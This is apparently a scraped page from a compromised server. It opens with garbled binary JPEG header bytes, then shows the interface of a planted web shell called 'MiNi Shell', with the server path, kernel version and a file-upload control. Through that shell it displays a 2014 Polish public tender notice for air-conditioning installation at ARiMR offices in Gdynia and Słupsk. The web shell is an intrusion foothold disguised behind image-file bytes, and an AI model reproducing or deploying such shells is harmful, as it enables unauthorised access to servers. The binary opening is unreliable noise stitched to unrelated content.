JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141009/335502-N-2014.html

<p class="kh_header"><b>Gdynia: ZAPROJEKTOWANIE, DOSTAWA I MONTAŻ SYSTEMÓW KLIMATYZACJI DLA POTRZEB POMORSKIEGO OR ARIMR  ORAZ ŚWIADCZENIE USŁUGI PRZEGLĄDÓW GWARANCYJNYCH I KONSERWACJI SYSTEMÓW KLIMATYZACJI</b><br>
<b>Numer ogłoszenia: 335502 - 2014; data zamieszczenia: 09.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Pomorski Oddział Regionalny , ul. Kołłątaja 1, 81-332 Gdynia, woj. pomorskie, tel. (0-58) 668-60-00/01, faks (0-58) 669-68-44.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa osoba prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAPROJEKTOWANIE, DOSTAWA I MONTAŻ SYSTEMÓW KLIMATYZACJI DLA POTRZEB POMORSKIEGO OR ARIMR  ORAZ ŚWIADCZENIE USŁUGI PRZEGLĄDÓW GWARANCYJNYCH I KONSERWACJI SYSTEMÓW KLIMATYZACJI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zaprojektowanie, dostawa i montaż systemów klimatyzacji do 40 pomieszczeń biurowych w Pomorskim Oddziale Regionalnym ARiMR w Gdyni ul. Kołłątaja 1, 81-332 Gdynia i do 5 pomieszczeń biurowych Słupskiego Biura Powiatowego ARiMR ul. Jana Pawła II 1,76-200 Słupsk oraz świadczenie usługi przeglądów gwarancyjnych i konserwacji systemów klimatyzacji.
2.Świadczenie usług przeglądów gwarancyjnych i konserwacji systemów klimatyzacji winno odbywać się w okresie 60 miesięcy w układzie zdarzeń: na początku każdego sezonu letniego, począwszy od maja 2015 r. (pierwszy przegląd) i na końcu każdego sezonu jesiennego, do listopada 2019 r. (ostatni przegląd). Przeglądy gwarancyjne i konserwacje obejmują dziesięć zdarzeń - przez zdarzenie rozumie się przegląd gwarancyjny i konserwację wszystkich dostarczonych i zainstalowanych w ramach niniejszego zamówienia urządzeń.
3.Kod Wspólnego Słownika Zamówień (CPV): 39.71.72.00-3, 45.33.12.20-4, 50.73.00.00-1
4.Wymagania dotyczące wykonania dostawy i montażu systemów klimatyzacji:
1) Wszystkie montaże systemów klimatyzacji muszą być poprzedzone wykonaniem wstępnego projektu technicznego, a ich zakończenie wykonaniem projektu powykonawczego, które stanowią integralną część przedmiotu zamówienia.
2) Projekt powykonawczy powinien zawierać usytuowanie jednostek wewnętrznych i zewnętrznych, przebieg przewodów czynnika chłodzącego, przewodów odprowadzenia skroplin oraz instalacji zasilania wraz ze schematami podłączenia.
3)Po wyborze Wykonawcy Zamawiający udostępni posiadaną dokumentację pomocną do sporządzenia w/w projektów.
4) Wszystkie materiały, elementy i urządzenia stosowane do wykonania przedmiotu zamówienia powinny spełniać wymagania Polskich Norm, a w razie ich braku posiadać decyzje dopuszczające je do stosowania w budownictwie na terenie Unii Europejskiej (CE).
5) Wszystkie materiały, elementy i urządzenia muszą być fabrycznie nowe i posiadać dokumenty gwarancji producenckiej. Na miejsce montażu winny zostać dostarczone w fabrycznych opakowaniach.
6) Wyroby budowlane powinny odpowiadać wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie określonych w art. 10 Ustawy Prawo Budowlane. Jakość materiałów i dokumentów powinna być potwierdzona odpowiednimi dokumentami.
7) Jednostki zewnętrzne należy montować zgodnie z dokumentacjami techniczno - ruchowymi dostarczonymi przez producenta urządzeń.
8) Sprężarki, wentylatory, zbiorniki oraz silniki elektryczne urządzeń powinny mieć trwale przymocowaną tabliczkę znamionową określającą:
a) Nazwę producenta,
b) Charakterystykę techniczną urządzenia,
c) Numer wyrobu i datę produkcji,
d) Znak kontroli technicznej.
9) Przed przystąpieniem do montażu należy sprawdzić stan techniczny urządzeń po transporcie i magazynowaniu.
10) Przy montażu należy bezwzględnie zachować wymagane odległości od ścian oraz pozostałych urządzeń, zapewnić stały, łatwy dostęp do włazów, otworów rewizyjnych, szachtów technicznych, etc. 
11) W siedzibie Pomorskiego OR w Gdyni jednostki wewnętrzne klimatyzatorów typu Multi-Split należy zamontować w 40 pomieszczeniach biurowych na trzech poziomach:
a) poziom najniższy  w 16 pomieszczeniach biurowych,
b) poziom średni w 19 pomieszczeniach biurowych,
c) poziom najwyższy w 5 pomieszczeniach biurowych.
12) W siedzibie Biura Powiatowego w Słupsku jednostki wewnętrzne klimatyzatorów typu Multi-Split należy zamontować w 5 pomieszczeniach biurowych na jednym poziomie.
13) Warunki montażu systemów klimatyzacji w pomieszczeniach Pomorskiego Oddziału Regionalnego ARiMR w Gdyni i Słupskiego Biura Powiatowego ARiMR przedstawia  Tabela nr 1.
14) Przewody poziome powinny być prowadzone w sposób umożliwiający ich odwadnianie w najniższych miejscach załamań przewodów.
15) Cała instalacja chłodnicza musi być  prowadzona w korytkach maskujących (instalacyjnych).
16) Przejścia przewodów przez stropy, dach i ściany konstrukcyjne należy wykonać w tulejach ochronnych.  W tulei ochronnej nie może być żadnych połączeń rur.
17) Instalacja chłodnicza między kondygnacjami musi być prowadzona w szachtach technicznych , przez ściany elewacyjne oraz w przestrzeni nad sufitem podwieszanym.
18) Rury w instalacji odprowadzającej skropliny należy łączyć przez zgrzewanie lub klejenie.
19) Roboty montażowe izolacji rurociągów należy wykonywać zgodnie z wymaganiami technicznymi.
20) Podłączenie jednostek zewnętrznych do instalacji należy wykonać po przeprowadzeniu prób jej szczelności.
21) Zalecana temperatura osiągana w pomieszczeniu - ok. 22 st. C.
22) Długość każdej instalacji chłodniczej i sterującej między jednostką wewnętrzną a zewnętrzną wynosi między 20 mb a 45 mb.
23) Wszystkie urządzenia w technologii INVERTER.
24) Długość każdej instalacji zasilającej do odpowiedniej rozdzielni wynosi ok. 45 mb.
25) Rozdzielnie muszą zostać wyposażone w zabezpieczenia różnicowo-prądowe dla każdego klimatyzatora.
26) Montaż jednostek zewnętrznych wymaga zastosowania podnośnika.
27) Jednostki zewnętrzne zamocowane do ściany budynku 20 cm powyżej dachu.
28) Różnica wysokości pomiędzy jednostkami wewnętrznymi a zewnętrznymi wynosi ok. 10 metrów.
29) Po zakończonych pracach instalacyjnych Wykonawca przekaże Zamawiającemu protokoły z przeprowadzenia pomiarów elektrycznych nowo zainstalowanych urządzeń.
30) Urządzenia muszą być objęte 60 miesięczna gwarancją producenta.
31) Do odbiorów końcowych dostawy i montażu Wykonawca musi dołączyć:
a) Projekt techniczny powykonawczy z naniesionymi ewentualnymi zmianami 
w stosunku do projektu wstępnego,
b) Protokoły zakończone wynikiem pozytywnym wykonanych badań odbiorczych - pomiary rezystencji izolacji i zabezpieczeń przeciwporażeniowych,
c) Instrukcje Obsługi i gwarancje producenta urządzeń
32) Warunki konieczne przedmiotu zamówienia (minimalne parametry techniczne) określają:
a)Tabela nr 2 - dotyczy systemów MULTI-SPLIT (ścienne) o długości instalacji chłodniczej do każdej jednostki wewnętrznej po 20 mb. tj. 1 komplet (2 wewn. + 1 zewn.).
b)Tabela nr 3 - dotyczy systemów MULTI-SPLIT (ścienne) o długości instalacji chłodniczej do każdej jednostki wewnętrznej po 45 mb. tj. 1 komplet (4 wewn. + 1 zewn.).
c)Tabela nr 4 - dotyczy systemów MULTI-SPLIT (ścienne) o długości instalacji chłodniczej do każdej jednostki wewnętrznej po 30 mb. tj. 3 komplety ( 5 wewn. + 1 zewn.) oraz 6 kompletów (4 wewn. + 1 zewn),
33) Urządzenia muszą spełniać następujące ogólne parametry:
a) Klasa energetyczna chłodzenie-grzanie - minimum A-A,
b) Urządzenia musza posiadać ruchome kierownice strumienia powietrza, opcję swing mode oraz możliwość zatrzymania kierownic w wybranym położeniu - dotyczy jednostki wewnętrznej,
c) Urządzenia wyposażone w pompki skroplin celem odprowadzenia kondensatu na dach budynku - dotyczy jednostki wewnętrznej,
d) Urządzenia muszą być wyposażone w możliwość łatwej obsługi wszystkich parametrów pracy za pomocą dołączonego bezprzewodowego pilota z bateriami- dotyczy jednostki wewnętrznej.
Zamawiający preferuje urządzenia marki MDV lub urządzenia równoważne, np.: Daikin, Fujitsu, Mishubishi, Toshiba, jednakże o parametrach technicznych nie gorszych od, przedstawionych w powyższych tabelach dla ww marek, parametrów minimalnych.
Wykonawca obowiązany jest wypełnić kolumnę C tabel określających parametry techniczne w formularzu ofertowym - Załącznik nr 1 do Specyfikacji..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.71.72.00-3, 45.33.12.20-4, 50.73.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2019.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie z art. 22 ust. 1 ustawy - Prawo zamówień publicznych. 
Ocena spełniania w/w warunku udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w oświadczeniach lub dokumentach wyszczególnionych w rozdziale VII niniejszej specyfikacji. Z treści załączonych oświadczeń lub dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie z art. 22 ust. 1 ustawy - Prawo zamówień publicznych.
Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że wykonał co najmniej 2 (dwie) dostawy wraz z montażem urządzeń klimatyzacyjnych o wartości co najmniej 200 000,00 zł (słownie: dwieście tysięcy zł) brutto każda, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie z art. 22 ust. 1 ustawy - Prawo zamówień publicznych.
Ocena spełniania w/w warunku udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w oświadczeniach lub dokumentach wyszczególnionych w rozdziale VII niniejszej specyfikacji. Z treści załączonych oświadczeń lub dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie z art. 22 ust. 1 ustawy - Prawo zamówień publicznych.
Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, iż dysponuje co najmniej:
a) jedną osobą posiadającą świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku dozoru w zakresie kontrolno-pomiarowych dla następujących urządzeń, instalacji i sieci Grupy 1: 1) - Urządzenia, instalacje i sieci elektroenergetyczne wytwarzające, przetwarzające, przesyłające i zużywające energię elektryczną, 2) urządzenia, instalacje i sieci elektroenergetyczne o napięciu nie wyższym niż 1kV,
b) dwoma osobami posiadającymi świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku eksploatacji w zakresie obsługi, konserwacji, remontów i montażu dla następujących urządzeń, instalacji i sieci Grupy 1: 1) - Urządzenia, instalacje i sieci elektroenergetyczne wytwarzające, przetwarzające, przesyłające i zużywające energię elektryczną, 2) urządzenia, instalacje i sieci elektroenergetyczne o napięciu nie wyższym niż 1kV.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie z art. 22 ust. 1 ustawy - Prawo zamówień publicznych.
Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, iż posiada opłaconą polisę, a w przypadku jej braku, innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - na łączną sumę co najmniej 300 000,00 zł (słownie: trzysta tysięcy złotych i 00/100).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony Formularz ofertowy (wg Załącznika Nr 1 do specyfikacji),
2) dokument wystawiony przez uprawniony podmiot potwierdzający, że urządzenie dopuszczone jest do stosowania, np. certyfikat CE,
3) karty katalogowe oferowanych urządzeń w języku polskim,
4) dokument wystawiony przez producenta urządzenia uprawniający osoby wskazane przez wykonawcę do montażu, uruchomienia i wykonywania konserwacji urządzeń wskazanych w ofercie,
5) dokument gwarancyjny wystawiony przez producenta urządzeń potwierdzający 60-miesięczną gwarancję urządzeń,
6) certyfikat dopuszczający  użytkowanie  urządzeń w pomieszczeniach biurowych (dotyczy jednostek wewnętrznych urządzenia),
7) pełnomocnictwo (oryginał lub notarialnie potwierdzoną kopię) do reprezentowania wykonawcy, w tym do podpisywania dokumentacji ofertowej, jeżeli wykonawca jest reprezentowany niezgodnie z zapisem we właściwym rejestrze (dotyczy to również pełnomocnictwa do reprezentowania konsorcjum, spółki cywilnej).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
